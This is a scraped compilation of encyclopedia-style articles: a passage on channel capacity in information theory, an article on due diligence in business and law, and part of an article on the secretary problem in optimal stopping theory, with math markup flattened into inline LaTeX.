For now we only need to find a distributionpX1,X2{\displaystyle p_{X_{1},X_{2}}}such thatI(X1,X2:Y1,Y2)≥I(X1:Y1)+I(X2:Y2){\displaystyle I(X_{1},X_{2}:Y_{1},Y_{2})\geq I(X_{1}:Y_{1})+I(X_{2}:Y_{2})}. In fact,π1{\displaystyle \pi _{1}}andπ2{\displaystyle \pi _{2}}, two probability distributions forX1{\displaystyle X_{1}}andX2{\displaystyle X_{2}}achievingC(p1){\displaystyle C(p_{1})}andC(p2){\displaystyle C(p_{2})}, suffice:
ie.C(p1×p2)≥C(p1)+C(p2){\displaystyle C(p_{1}\times p_{2})\geq C(p_{1})+C(p_{2})}
Now let us show thatC(p1×p2)≤C(p1)+C(p2){\displaystyle C(p_{1}\times p_{2})\leq C(p_{1})+C(p_{2})}.
Letπ12{\displaystyle \pi _{12}}be some distribution for the channelp1×p2{\displaystyle p_{1}\times p_{2}}defining(X1,X2){\displaystyle (X_{1},X_{2})}and the corresponding output(Y1,Y2){\displaystyle (Y_{1},Y_{2})}. LetX1{\displaystyle {\mathcal {X}}_{1}}be the alphabet ofX1{\displaystyle X_{1}},Y1{\displaystyle {\mathcal {Y}}_{1}}forY1{\displaystyle Y_{1}}, and analogouslyX2{\displaystyle {\mathcal {X}}_{2}}andY2{\displaystyle {\mathcal {Y}}_{2}}.
By definition of mutual information, we have
I(X1,X2:Y1,Y2)=H(Y1,Y2)−H(Y1,Y2|X1,X2)≤H(Y1)+H(Y2)−H(Y1,Y2|X1,X2){\displaystyle {\begin{aligned}I(X_{1},X_{2}:Y_{1},Y_{2})&=H(Y_{1},Y_{2})-H(Y_{1},Y_{2}|X_{1},X_{2})\\&\leq H(Y_{1})+H(Y_{2})-H(Y_{1},Y_{2}|X_{1},X_{2})\end{aligned}}}
Let us rewrite the last term ofentropy.
H(Y1,Y2|X1,X2)=∑(x1,x2)∈X1×X2P(X1,X2=x1,x2)H(Y1,Y2|X1,X2=x1,x2){\displaystyle H(Y_{1},Y_{2}|X_{1},X_{2})=\sum _{(x_{1},x_{2})\in {\mathcal {X}}_{1}\times {\mathcal {X}}_{2}}\mathbb {P} (X_{1},X_{2}=x_{1},x_{2})H(Y_{1},Y_{2}|X_{1},X_{2}=x_{1},x_{2})}
By definition of the product channel,P(Y1,Y2=y1,y2|X1,X2=x1,x2)=P(Y1=y1|X1=x1)P(Y2=y2|X2=x2){\displaystyle \mathbb {P} (Y_{1},Y_{2}=y_{1},y_{2}|X_{1},X_{2}=x_{1},x_{2})=\mathbb {P} (Y_{1}=y_{1}|X_{1}=x_{1})\mathbb {P} (Y_{2}=y_{2}|X_{2}=x_{2})}.
For a given pair(x1,x2){\displaystyle (x_{1},x_{2})}, we can rewriteH(Y1,Y2|X1,X2=x1,x2){\displaystyle H(Y_{1},Y_{2}|X_{1},X_{2}=x_{1},x_{2})}as:
H(Y1,Y2|X1,X2=x1,x2)=∑(y1,y2)∈Y1×Y2P(Y1,Y2=y1,y2|X1,X2=x1,x2)log(P(Y1,Y2=y1,y2|X1,X2=x1,x2))=∑(y1,y2)∈Y1×Y2P(Y1,Y2=y1,y2|X1,X2=x1,x2)[log(P(Y1=y1|X1=x1))+log(P(Y2=y2|X2=x2))]=H(Y1|X1=x1)+H(Y2|X2=x2){\displaystyle {\begin{aligned}H(Y_{1},Y_{2}|X_{1},X_{2}=x_{1},x_{2})&=\sum _{(y_{1},y_{2})\in {\mathcal {Y}}_{1}\times {\mathcal {Y}}_{2}}\mathbb {P} (Y_{1},Y_{2}=y_{1},y_{2}|X_{1},X_{2}=x_{1},x_{2})\log(\mathbb {P} (Y_{1},Y_{2}=y_{1},y_{2}|X_{1},X_{2}=x_{1},x_{2}))\\&=\sum _{(y_{1},y_{2})\in {\mathcal {Y}}_{1}\times {\mathcal {Y}}_{2}}\mathbb {P} (Y_{1},Y_{2}=y_{1},y_{2}|X_{1},X_{2}=x_{1},x_{2})[\log(\mathbb {P} (Y_{1}=y_{1}|X_{1}=x_{1}))+\log(\mathbb {P} (Y_{2}=y_{2}|X_{2}=x_{2}))]\\&=H(Y_{1}|X_{1}=x_{1})+H(Y_{2}|X_{2}=x_{2})\end{aligned}}}
By summing this equality over all(x1,x2){\displaystyle (x_{1},x_{2})}, we obtainH(Y1,Y2|X1,X2)=H(Y1|X1)+H(Y2|X2){\displaystyle H(Y_{1},Y_{2}|X_{1},X_{2})=H(Y_{1}|X_{1})+H(Y_{2}|X_{2})}.
We can now give an upper bound over mutual information:
I(X1,X2:Y1,Y2)≤H(Y1)+H(Y2)−H(Y1|X1)−H(Y2|X2)=I(X1:Y1)+I(X2:Y2){\displaystyle {\begin{aligned}I(X_{1},X_{2}:Y_{1},Y_{2})&\leq H(Y_{1})+H(Y_{2})-H(Y_{1}|X_{1})-H(Y_{2}|X_{2})\\&=I(X_{1}:Y_{1})+I(X_{2}:Y_{2})\end{aligned}}}
This relation is preserved at the supremum. Therefore
Combining the two inequalities we proved, we obtain the result of the theorem:
IfGis anundirected graph, it can be used to define a communications channel in which the symbols are the graph vertices, and two codewords may be confused with each other if their symbols in each position are equal or adjacent. The computational complexity of finding the Shannon capacity of such a channel remains open, but it can be upper bounded by another important graph invariant, theLovász number.[5]
Thenoisy-channel coding theoremstates that for any error probability ε > 0 and for any transmissionrateRless than the channel capacityC, there is an encoding and decoding scheme transmitting data at rateRwhose error probability is less than ε, for a sufficiently large block length. Also, for any rate greater than the channel capacity, the probability of error at the receiver goes to 0.5 as the block length goes to infinity.
An application of the channel capacity concept to anadditive white Gaussian noise(AWGN) channel withBHzbandwidthandsignal-to-noise ratioS/Nis theShannon–Hartley theorem:
Cis measured inbits per secondif thelogarithmis taken in base 2, ornatsper second if thenatural logarithmis used, assumingBis inhertz; the signal and noise powersSandNare expressed in a linearpower unit(like watts or volts2). SinceS/Nfigures are often cited indB, a conversion may be needed. For example, a signal-to-noise ratio of 30 dB corresponds to a linear power ratio of1030/10=103=1000{\displaystyle 10^{30/10}=10^{3}=1000}.
To determine the channel capacity, it is necessary to find the capacity-achieving distributionpX(x){\displaystyle p_{X}(x)}and evaluate themutual informationI(X;Y){\displaystyle I(X;Y)}. Research has mostly focused on studying additive noise channels under certain power constraints and noise distributions, as analytical methods are not feasible in the majority of other scenarios. Hence, alternative approaches such as, investigation on the input support,[6]relaxations[7]and capacity bounds,[8]have been proposed in the literature.
The capacity of a discrete memoryless channel can be computed using theBlahut-Arimoto algorithm.
Deep learningcan be used to estimate the channel capacity. In fact, the channel capacity and the capacity-achieving distribution of any discrete-time continuous memoryless vector channel can be obtained using CORTICAL,[9]a cooperative framework inspired bygenerative adversarial networks. CORTICAL consists of two cooperative networks: a generator with the objective of learning to sample from the capacity-achieving input distribution, and a discriminator with the objective to learn to distinguish between paired and unpaired channel input-output samples and estimatesI(X;Y){\displaystyle I(X;Y)}.
This section[10]focuses on the single-antenna, point-to-point scenario. For channel capacity in systems with multiple antennas, see the article onMIMO.
If the average received power isP¯{\displaystyle {\bar {P}}}[W], the total bandwidth isW{\displaystyle W}in Hertz, and the noisepower spectral densityisN0{\displaystyle N_{0}}[W/Hz], the AWGN channel capacity is
whereP¯N0W{\displaystyle {\frac {\bar {P}}{N_{0}W}}}is the received signal-to-noise ratio (SNR). This result is known as theShannon–Hartley theorem.[11]
When the SNR is large (SNR ≫ 0 dB), the capacityC≈Wlog2P¯N0W{\displaystyle C\approx W\log _{2}{\frac {\bar {P}}{N_{0}W}}}is logarithmic in power and approximately linear in bandwidth. This is called thebandwidth-limited regime.
When the SNR is small (SNR ≪ 0 dB), the capacityC≈P¯N0ln2{\displaystyle C\approx {\frac {\bar {P}}{N_{0}\ln 2}}}is linear in power but insensitive to bandwidth. This is called thepower-limited regime.
The bandwidth-limited regime and power-limited regime are illustrated in the figure.
The capacity of thefrequency-selectivechannel is given by so-calledwater fillingpower allocation,
wherePn∗=max{(1λ−N0|h¯n|2),0}{\displaystyle P_{n}^{*}=\max \left\{\left({\frac {1}{\lambda }}-{\frac {N_{0}}{|{\bar {h}}_{n}|^{2}}}\right),0\right\}}and|h¯n|2{\displaystyle |{\bar {h}}_{n}|^{2}}is the gain of subchanneln{\displaystyle n}, withλ{\displaystyle \lambda }chosen to meet the power constraint.
In aslow-fading channel, where the coherence time is greater than the latency requirement, there is no definite capacity as the maximum rate of reliable communications supported by the channel,log2(1+|h|2SNR){\displaystyle \log _{2}(1+|h|^{2}SNR)}, depends on the random channel gain|h|2{\displaystyle |h|^{2}}, which is unknown to the transmitter. If the transmitter encodes data at rateR{\displaystyle R}[bits/s/Hz], there is a non-zero probability that the decoding error probability cannot be made arbitrarily small,
in which case the system is said to be in outage. With a non-zero probability that the channel is in deep fade, the capacity of the slow-fading channel in strict sense is zero. However, it is possible to determine the largest value ofR{\displaystyle R}such that the outage probabilitypout{\displaystyle p_{out}}is less thanϵ{\displaystyle \epsilon }. This value is known as theϵ{\displaystyle \epsilon }-outage capacity.
In afast-fading channel, where the latency requirement is greater than the coherence time and the codeword length spans many coherence periods, one can average over many independent channel fades by coding over a large number of coherence time intervals. Thus, it is possible to achieve a reliable rate of communication ofE(log2(1+|h|2SNR)){\displaystyle \mathbb {E} (\log _{2}(1+|h|^{2}SNR))}[bits/s/Hz] and it is meaningful to speak of this value as the capacity of the fast-fading channel.
Feedback capacity is the greatest rate at whichinformationcan be reliably transmitted, per unit time, over a point-to-pointcommunication channelin which the receiver feeds back the channel outputs to the transmitter. Information-theoretic analysis of communication systems that incorporate feedback is more complicated and challenging than without feedback. Possibly, this was the reasonC.E. Shannonchose feedback as the subject of the first Shannon Lecture, delivered at the 1973 IEEE International Symposium on Information Theory in Ashkelon, Israel.
The feedback capacity is characterized by the maximum of thedirected informationbetween the channel inputs and the channel outputs, where the maximization is with respect to the causal conditioning of the input given the output. Thedirected informationwas coined byJames Massey[12]in 1990, who showed that its an upper bound on feedback capacity. Formemoryless channels, Shannon showed[13]that feedback does not increase the capacity, and the feedback capacity coincides with the channel capacity characterized by themutual informationbetween the input and the output. The feedback capacity is known as a closed-form expression only for several examples such as the trapdoor channel,[14]Ising channel,[15][16]. For some other channels, it is characterized through constant-size optimization problems such as the binary erasure channel with a no-consecutive-ones input constraint,[17]NOST channel.[18]
The basic mathematical model for a communication system is the following:
Here is the formal definition of each element (where the only difference with respect to the nonfeedback capacity is the encoder definition):
That is, for each timei{\displaystyle i}there exists a feedback of the previous outputYi−1{\displaystyle Y_{i-1}}such that the encoder has access to all previous outputsYi−1{\displaystyle Y^{i-1}}. An(2nR,n){\displaystyle (2^{nR},n)}code is a pair of encoding and decoding mappings withW=[1,2,…,2nR]{\displaystyle {\mathcal {W}}=[1,2,\dots ,2^{nR}]}, andW{\displaystyle W}is uniformly distributed. A rateR{\displaystyle R}is said to beachievableif there exists a sequence of codes(2nR,n){\displaystyle (2^{nR},n)}such that theaverage probability of error:Pe(n)≜Pr(W^≠W){\displaystyle P_{e}^{(n)}\triangleq \Pr({\hat {W}}\neq W)}tends to zero asn→∞{\displaystyle n\to \infty }.
Thefeedback capacityis denoted byCfeedback{\displaystyle C_{\text{feedback}}}, and is defined as the supremum over all achievable rates.
LetX{\displaystyle X}andY{\displaystyle Y}be modeled as random variables. Thecausal conditioningP(yn||xn)≜∏i=1nP(yi|yi−1,xi){\displaystyle P(y^{n}||x^{n})\triangleq \prod _{i=1}^{n}P(y_{i}|y^{i-1},x^{i})}describes the given channel. The choice of thecausally conditional distributionP(xn||yn−1)≜∏i=1nP(xi|xi−1,yi−1){\displaystyle P(x^{n}||y^{n-1})\triangleq \prod _{i=1}^{n}P(x_{i}|x^{i-1},y^{i-1})}determines thejoint distributionpXn,Yn(xn,yn){\displaystyle p_{X^{n},Y^{n}}(x^{n},y^{n})}due to the chain rule for causal conditioning[19]P(yn,xn)=P(yn||xn)P(xn||yn−1){\displaystyle P(y^{n},x^{n})=P(y^{n}||x^{n})P(x^{n}||y^{n-1})}which, in turn, induces adirected informationI(XN→YN)=E[logP(YN||XN)P(YN)]{\displaystyle I(X^{N}\rightarrow Y^{N})=\mathbf {E} \left[\log {\frac {P(Y^{N}||X^{N})}{P(Y^{N})}}\right]}.
Thefeedback capacityis given by
where thesupremumis taken over all possible choices ofPXn||Yn−1(xn||yn−1){\displaystyle P_{X^{n}||Y^{n-1}}(x^{n}||y^{n-1})}.
When the Gaussian noise is colored, the channel has memory. Consider for instance the simple case on anautoregressive modelnoise processzi=zi−1+wi{\displaystyle z_{i}=z_{i-1}+w_{i}}wherewi∼N(0,1){\displaystyle w_{i}\sim N(0,1)}is an i.i.d. process.
The feedback capacity is difficult to solve in the general case. There are some techniques that are related to control theory andMarkov decision processesif the channel is discrete.
|
https://en.wikipedia.org/wiki/Channel_capacity
|
Due diligenceis the investigation or exercise of care that a reasonable business or person is normally expected to take before entering into an agreement orcontractwith another party or an act with a certainstandard of care.
Due diligence can be alegal obligation, but the term more commonly applies to voluntary investigations. It may also offer adefenceagainst legal action. A common example of due diligence is the process through which a potential acquirer evaluates a target company or its assets in advance of amerger or acquisition.[1]The theory behind due diligence holds that performing this type of investigation contributes significantly to informed decision making by enhancing the amount and quality of information available to decision makers and by ensuring that this information is systematically used to deliberate on the decision at hand and all its costs, benefits, and risks.[2]
The term "due diligence" can be read as "required carefulness" or "reasonable care" in general usage, and has been used in the literal sense of "requisite effort" since at least the mid-fifteenth century.[3]It became a specializedlegal termand later a common business term due to the United States'Securities Act of 1933, where the process is called "reasonable investigation". Under Section 11b3, a person could avoid liability for an untrue statement of a material fact if they had, "after reasonable investigation, reasonable ground to believe and did believe, at the time", the truth of the statement.[4]The defense at Section 11, referred to later in legal usage as the "due diligence" defense, could be used bybroker-dealerswhen accused of inadequate disclosure to investors of material information with respect to the purchase ofsecurities. In legal and business use, the term was soon used for the process itself instead of how it was to be performed, so that the original expressions such as "exercise due diligence in investigating" and "investigation carried out with due diligence" were soon shortened to "due diligence investigation" and finally "due diligence".
As long as broker-dealers exercised "due diligence" (required carefulness) in their investigation into the company whoseequitythey were selling, and as long as they disclosed to the investor what they found, they would not be found liable for non-disclosure of information that was not discovered in the process of that investigation.
The broker-dealer community quickly institutionalized,[when?]as a standard practice, the conducting of due diligence investigations of any stock offerings in which they involved themselves. Originally the term was limited to public offerings of equity investments, but over time it has become associated with investigations of privatemergers and acquisitions(M&A) as well.
Due diligence takes different forms depending on its purpose:
A due diligence process can be divided into nine distinct areas:[5]
It is essential that the concepts of valuations (shareholder value analysis) be considered in a due diligence process. This is in order to reduce the number of failed mergers and acquisitions.[5]
In this regard, two new audit areas have been incorporated into the Due Diligence framework:[5]
The relevant areas of concern may include the financial, legal, labor, tax, IT, environment and market/commercial situation of the company. Other areas include intellectual property, real and personal property, insurance and liability coverage, debt instrument review, employee benefits (including theAffordable Care Act) and labor matters, immigration, and international transactions.[9][10][11]Areas of focus in due diligence continue to develop withcybersecurityemerging as an area of concern for business acquirers.[12]Risk is a key factor in determining 'duty of care'.[13]Regulations require 'reasonable security' in cybersecurity programs, and litigators examine whether 'due care' was practiced. Due diligence findings impact a number of aspects of the transaction including the purchase price, therepresentations and warrantiesnegotiated in the transaction agreement, and theindemnificationprovided by the sellers.
Due Diligence has emerged as a separate profession for accounting and auditing experts and is typically referred to as Transaction Services.[further explanation needed]
With the number and size of penalties increasing, the United States'Foreign Corrupt Practices Act(FCPA) has caused many U.S. institutions to look into how they evaluate all of their relationships overseas. The lack of a due diligence of a company's agents, vendors, and suppliers, as well as merger and acquisition partners in foreign countries could lead to doing business with an organization linked to aforeign officialor state owned enterprises and their executives. This link could be perceived as leading to the bribing of the foreign officials and as a result lead to noncompliance with the FCPA. Due diligence in regard to FCPA compliance is required in two aspects:
In the M&A context, buyers can use the due diligence phase to integrate a target into their internal FCPA controls, focusing initial efforts on necessary revisions to the target's business activities with a high-risk of corruption.[15]
While financial institutions are among the most aggressive in defining FCPA best practices, manufacturing, retailing and energy industries are highly active in managing FCPA compliance programs.
In the United Kingdom, theBribery Act 2010requires companies using an "adequate procedures" defence to a charge of bribery to have undertaken due diligence on their business partners. Due diligence is described as "knowing exactly who you are dealing with". Official guidance suggests that "ask[ing] a few questions and do[ing] a few checks" can help to protect an organisation from taking on untrustworthy partners.[16]
Passed on May 25, 2011, theOECDmember countries agreed to revise their guidelines promoting tougher standards of corporate behavior, including human rights. As part of this new definition, they utilized a new aspect of due diligence that requires a corporation to investigate third party partners for potential abuse of human rights.
TheOECD Guidelines for Multinational Enterprises(a government-backed international agreement that provides guidance on responsible business conduct) state that multinational enterprises will "Seek ways to prevent or mitigate adverse human rights impacts that are directly linked to their business operations, products or services by a business relationship, even if they do not contribute to those impacts".[17]
The term 'due diligence' was originally put forward in this context by UN Special Representative for Human Rights and BusinessJohn Ruggie, who used it as an umbrella to cover the steps and processes by which a company understands, monitors and mitigates its human rights impacts.Human Rights Impact Assessmentis a component of this.
The UN formalized guidelines for Human Rights Due Diligence on June 16, 2011, with the endorsement of Ruggie's Guiding Principles for Business and Human Rights.[18]
Due diligence in civil procedure is the idea that reasonable investigation is necessary before certain kinds ofreliefare requested. For example, duly diligent efforts to locate and/or serve a party with civil process is frequently a requirement for a party seeking to use means other thanpersonal serviceto obtain jurisdiction over a party. Similarly, in areas of the law such asbankruptcy, an attorney representing someone filing a bankruptcy petition must engage in due diligence to determine that the representations made in the bankruptcy petition are factually accurate. Due diligence is also generally prerequisite to a request for relief in states where civil litigants are permitted to conduct pre-litigation discovery of facts necessary to determine whether or not a party has a factual basis for a cause of action.
In civil actions seeking a foreclosure or seizure of property, a party requesting this relief is frequently required to engage in due diligence to determine who may claim an interest in the property by reviewing public records concerning the property and sometimes by a physical inspection of the property that would reveal a possible interest in the property of a tenant or other person.
Due diligence is also a concept found in the civil litigation concept of astatute of limitations. Frequently, a statute of limitations begins to run against a plaintiff when that plaintiff knew or should have known had that plaintiff investigated the matter with due diligence that the plaintiff had a claim against a defendant. In this context, the term "due diligence" determines the scope of a party'sconstructive knowledge, upon receiving notice of facts sufficient to constitute "inquiry notice" that alerts a would-be plaintiff that further investigation might reveal a cause of action.
Incriminal law, due diligence is the only available defense to a crime that is one ofstrict liability(i.e., a crime that only requires anactus reusand nomens rea). Once a criminal offence is proven, the defendant must prove on balance that they did everything possible to prevent the act from happening. It is not enough that they met the normalstandard of carein their industry – they must show that they took every reasonable precaution.
The term "due diligence" is also used in criminal law to describe the scope of the duty of a prosecutor to make efforts to turn over potentiallyexculpatory evidenceto (accused) criminal defendants.[citation needed]
In criminal law, "due diligence" also identifies the standard a prosecuting entity must satisfy in pursuing an action against a defendant, especially with regard to the provision of the Federal and State Constitutional and statutory right to a speedy trial or to have a warrant or detainer served in an action. In cases where a defendant is in any type of custodial situation where their freedom is constrained, it is solely the prosecuting entity's duty to ensure the provision of such rights and present the citizen before the court with jurisdiction. This also applies where the respective judicial system and/or prosecuting entity has current address or contact information on the named party and said party has made no attempt to evade notice of the prosecution of the action.[19]
In the United Kingdom, "proper use of a due diligence system" may be used as a defence against a charge of breach of regulations: for example, under the Timber and Timber Products (Placing on the Market) Regulations 2013[20]and the Environmental Protection (Microbeads) (England) Regulations 2017,[21]businesses may be able to defend a charge of non-compliance with regulations if they can show that they have undertaken supplier due diligence to a necessary standard. References to "due diligence" and the maintenance of a "due diligence system" in the regulation concerning timber are drawn from theEuropean Union's Regulation 995/2010, which covers the legal obligations of "operators who place timber and timber products on the market".[20]
|
https://en.wikipedia.org/wiki/Due_diligence
|
Thesecretary problemdemonstrates a scenario involvingoptimal stoppingtheory[1][2]that is studied extensively in the fields ofapplied probability,statistics, anddecision theory. It is also known as themarriage problem, thesultan's dowry problem, thefussy suitor problem, thegoogol game, and thebest choice problem. Its solution is also known as the37% rule.[3]
The basic form of the problem is the following: imagine an administrator who wants to hire the best secretary out ofn{\displaystyle n}rankable applicants for a position. The applicants are interviewed one by one in random order. A decision about each particular applicant is to be made immediately after the interview. Once rejected, an applicant cannot be recalled. During the interview, the administrator gains information sufficient to rank the applicant among all applicants interviewed so far, but is unaware of the quality of yet unseen applicants. The question is about the optimal strategy (stopping rule) to maximize the probability of selecting the best applicant. If the decision can be deferred to the end, this can be solved by the simple maximumselection algorithmof tracking the running maximum (and who achieved it), and selecting the overall maximum at the end. The difficulty is that the decision must be made immediately.
The shortest rigorous proof known so far is provided by theodds algorithm. It implies that the optimal win probability is always at least1/e{\displaystyle 1/e}(whereeis the base of thenatural logarithm), and that the latter holds even in a much greater generality. The optimal stopping rule prescribes always rejecting the first∼n/e{\displaystyle \sim n/e}applicants that are interviewed and then stopping at the first applicant who is better than every applicant interviewed so far (or continuing to the last applicant if this never occurs). Sometimes this strategy is called the1/e{\displaystyle 1/e}stopping rule, because the probability of stopping at the best applicant with this strategy is already about1/e{\displaystyle 1/e}for moderate values ofn{\displaystyle n}. One reason why the secretary problem has received so much attention is that the optimal policy for the problem (the stopping rule) is simple and selects the single best candidate about 37% of the time, irrespective of whether there are 100 or 100 million applicants. The secretary problem is anexploration–exploitation dilemma.
Although there are many variations, the basic problem can be stated as follows:
Acandidateis defined as an applicant who, when interviewed, is better than all the applicants interviewed previously.Skipis used to mean "reject immediately after the interview". Since the objective in the problem is to select the single best applicant, only candidates will be considered for acceptance. The "candidate" in this context corresponds to the concept of record in permutation.
The optimal policy for the problem is astopping rule. Under it, the interviewer rejects the firstr− 1 applicants (let applicantMbe the best applicant among theser− 1 applicants), and then selects the first subsequent applicant that is better than applicantM. It can be shown that the optimal strategy lies in this class of strategies.[citation needed](Note that we should never choose an applicant who is not the best we have seen so far, since they cannot be the best overall applicant.) For an arbitrary cutoffr, the probability that the best applicant is selected is
The sum is not defined forr= 1, but in this case the only feasible policy is to select the first applicant, and henceP(1) = 1/n. This sum is obtained by noting that if applicantiis the best applicant, then it is selected if and only if the best applicant among the firsti− 1 applicants is among the firstr− 1 applicants that were rejected. Lettingntend to infinity, writingx{\displaystyle x}as the limit of(r−1)/n, usingtfor(i−1)/nanddtfor 1/n, the sum can be approximated by the integral
Taking the derivative ofP(x) with respect tox{\displaystyle x}, setting it to 0, and solving forx, we find that the optimalxis equal to 1/e. Thus, the optimal cutoff tends ton/easnincreases, and the best applicant is selected with probability 1/e.
For small values ofn, the optimalrcan also be obtained by standarddynamic programmingmethods. The optimal thresholdsrand probability of selecting the best alternativePfor several values ofnare shown in the following table.[note 1]
The probability of selecting the best applicant in the classical secretary problem converges toward1/e≈0.368{\displaystyle 1/e\approx 0.368}.
This problem and several modifications can be solved (including the proof of optimality) in a straightforward manner by theodds algorithm, which also has other applications. Modifications for the secretary problem that can be solved by this algorithm include random availabilities of applicants, more general hypotheses for applicants to be of interest to the decision maker, group interviews for applicants, as well as certain models for a random number of applicants.[citation needed]
The solution of the secretary problem is only meaningful if it is justified to assume that the applicants have no knowledge of the decision strategy employed, because early applicants have no chance at all and may not show up otherwise.
One important drawback for applications of the solution of the classical secretary problem is that the number of applicantsn{\displaystyle n}must be known in advance, which is rarely the case. One way to overcome this problem is to suppose that the number of applicants is a random variableN{\displaystyle N}with a known distribution ofP(N=k)k=1,2,⋯{\displaystyle P(N=k)_{k=1,2,\cdots }}(Presman and Sonin, 1972). For this model, the optimal solution is in general much harder, however. Moreover, the optimal success probability is now no longer around 1/ebut typically lower. This can be understood in the context of having a "price" to pay for not knowing the number of applicants. However, in this model the price is high. Depending on the choice of the distribution ofN{\displaystyle N}, the optimal win probability can approach zero. Looking for ways to cope with this new problem led to a new model yielding the so-called 1/e-law of best choice.
The essence of the model is based on the idea that life is sequential and that real-world problems pose themselves in real time. Also, it is easier to estimate times in which specific events (arrivals of applicants) should occur more frequently (if they do) than to estimate the distribution of the number of specific events which will occur. This idea led to the following approach, the so-calledunified approach(1984):
The model is defined as follows: An applicant must be selected on some time interval[0,T]{\displaystyle [0,T]}from an unknown numberN{\displaystyle N}of rankable applicants. The goal is to maximize the probability of selecting only the best under the hypothesis that all arrival orders of different ranks are equally likely. Suppose that all applicants have the same, but independent to each other, arrival time densityf{\displaystyle f}on[0,T]{\displaystyle [0,T]}and letF{\displaystyle F}denote the corresponding arrival time distribution function, that is
Letτ{\displaystyle \tau }be such thatF(τ)=1/e.{\displaystyle F(\tau )=1/e.}Consider the strategy to wait and observe all applicants up to timeτ{\displaystyle \tau }and then to select, if possible, the first candidate after timeτ{\displaystyle \tau }which is better than all preceding ones. Then this strategy, called1/e-strategy, has the following properties:
The1/e-strategy
The 1/e-law, proved in 1984 byF. Thomas Bruss, came as a surprise. The reason was that a value of about 1/e had been considered before as being out of reach in a model for unknownN{\displaystyle N}, whereas this value 1/e was now achieved as a lower bound for the success probability, and this in a model with arguably much weaker hypotheses (see e.g. Math. Reviews 85:m).
However, there are many other strategies that achieve (i) and (ii) and, moreover, perform strictly better than the 1/e-strategy
simultaneously for allN{\displaystyle N}>2. A simple example is the strategy which selects (if possible) the first relatively best candidate after timeτ{\displaystyle \tau }provided that at least one applicant arrived before this time, and otherwise selects (if possible) the second relatively best candidate after timeτ{\displaystyle \tau }.[4]
The 1/e-law is sometimes confused with the solution for the classical secretary problem described above because of the similar role of the number 1/e. However, in the 1/e-law, this role is more general. The result is also stronger, since it holds for an unknown number of applicants and since the model based on an arrival time distribution F is more tractable for applications.
In the article "Who solved the Secretary problem?" (Ferguson, 1989)[1], it's claimed the secretary problem first appeared in print inMartin Gardner's February 1960Mathematical Games columninScientific American:
Ask someone to take as many slips of paper as he pleases, and on each slip write a different positive number. The numbers may range from small fractions of 1 to a number the size of agoogol(1 followed by a hundred zeroes) or even larger. These slips are turned face down and shuffled over the top of a table. One at a time you turn the slips face up. The aim is to stop turning when you come to the number that you guess to be the largest of the series. You cannot go back and pick a previously turned slip. If you turn over all the slips, then of course you must pick the last one turned.[5]
Ferguson pointed out that the secretarygameremained unsolved, as azero-sum gamewith two antagonistic players.[1]In this game:
The difference with the basic secretary problem are two:
Alice first writes down n numbers, which are then shuffled. So, their ordering does not matter, meaning that Alice's numbers must be anexchangeable random variable sequenceX1,X2,...,Xn{\displaystyle X_{1},X_{2},...,X_{n}}. Alice's strategy is then just picking the trickiest exchangeable random variable sequence.
Bob's strategy is formalizable as astopping ruleτ{\displaystyle \tau }for the sequenceX1,X2,...,Xn{\displaystyle X_{1},X_{2},...,X_{n}}.
We say that a stopping ruleτ{\displaystyle \tau }for Bob is arelative rank stopping strategyif it depends on only the relative ranks ofX1,X2,...,Xn{\displaystyle X_{1},X_{2},...,X_{n}}, and not on their numerical values. In other words, it is as if someone secretly intervened after Alice picked her numbers, and changed each number inX1,X2,...,Xn{\displaystyle X_{1},X_{2},...,X_{n}}into its relative rank (breaking ties randomly). For example,0.2,0.3,0.3,0.1{\displaystyle 0.2,0.3,0.3,0.1}is changed to2,3,4,1{\displaystyle 2,3,4,1}or2,4,3,1{\displaystyle 2,4,3,1}with equal probability. This makes itas ifAlice played an exchangeable random permutation on{1,2,...,n}{\displaystyle \{1,2,...,n\}}. Now, since the only exchangeable random permutation on{1,2,...,n}{\displaystyle \{1,2,...,n\}}is just the uniform distribution over all permutations on{1,2,...,n}{\displaystyle \{1,2,...,n\}}, the optimal relative rank stopping strategy is the optimal stopping rule for the secretary problem, given above, with a winning probabilityPr(Xτ=maxi∈1:nXi)=maxr∈1:nr−1n∑i=rn1i−1{\displaystyle Pr(X_{\tau }=\max _{i\in 1:n}X_{i})=\max _{r\in 1:n}{\frac {r-1}{n}}\sum _{i=r}^{n}{\frac {1}{i-1}}}Alice's goal then is to make sure Bob cannot do better than the relative-rank stopping strategy.
By the rules of the game, Alice's sequence must be exchangeable, but to do well in the game, Alice should not pick it to be independent. If Alice samples the numbers independently from some fixed distribution, it would allow Bob to do better. To see this intuitively, imagine ifn=2{\displaystyle n=2}, and Alice is to pick both numbers from the normal distributionN(0,1){\displaystyle N(0,1)}, independently. Then if Bob turns over one number and sees−3{\displaystyle -3}, then he can quite confidently turn over the second number, and if Bob turns over one number and sees+3{\displaystyle +3}, then he can quite confidently pick the first number. Alice can do better by pickingX1,X2{\displaystyle X_{1},X_{2}}that are positively correlated.
So the fully formal statement is as below:
Does there exist an exchangeable sequence of random variablesX1,...,Xn{\displaystyle X_{1},...,X_{n}}, such that foranystopping ruleτ{\displaystyle \tau },Pr(Xτ=maxi∈1:nXi)≤maxr∈1:nr−1n∑i=rn1i−1{\displaystyle Pr(X_{\tau }=\max _{i\in 1:n}X_{i})\leq \max _{r\in 1:n}{\frac {r-1}{n}}\sum _{i=r}^{n}{\frac {1}{i-1}}}?
Forn=2{\displaystyle n=2}, if Bob plays the optimal relative-rank stoppings strategy, then Bob has a winning probability 1/2. Surprisingly, Alice has nominimaxstrategy, which is closely related to a paradox ofT. Cover[6]and thetwo envelopes paradox. Concretely, Bob can play this strategy: sample a random numberY{\displaystyle Y}. IfX1>Y{\displaystyle X_{1}>Y}, then pickX1{\displaystyle X_{1}}, else pickX2{\displaystyle X_{2}}. Now, Bob can win with probability strictly greater than 1/2. Suppose Alice's numbers are different, then condition onY∉[min(X1,X2),max(X1,X2)]{\displaystyle Y\not \in [\min(X_{1},X_{2}),\max(X_{1},X_{2})]}, Bob wins with probability 1/2, but condition onY∈[min(X1,X2),max(X1,X2)]{\displaystyle Y\in [\min(X_{1},X_{2}),\max(X_{1},X_{2})]}, Bob wins with probability 1.
Note the random numberY{\displaystyle Y}can be sampled fromanyrandom distribution, as long asY∈[min(X1,X2),max(X1,X2)]{\displaystyle Y\in [\min(X_{1},X_{2}),\max(X_{1},X_{2})]}has a nonzero probability.
However, for anyϵ>0{\displaystyle \epsilon >0}, Alice can construct an exchangeable sequenceX1,X2{\displaystyle X_{1},X_{2}}such that Bob's winning probability is at most1/2+ϵ{\displaystyle 1/2+\epsilon }.[1]
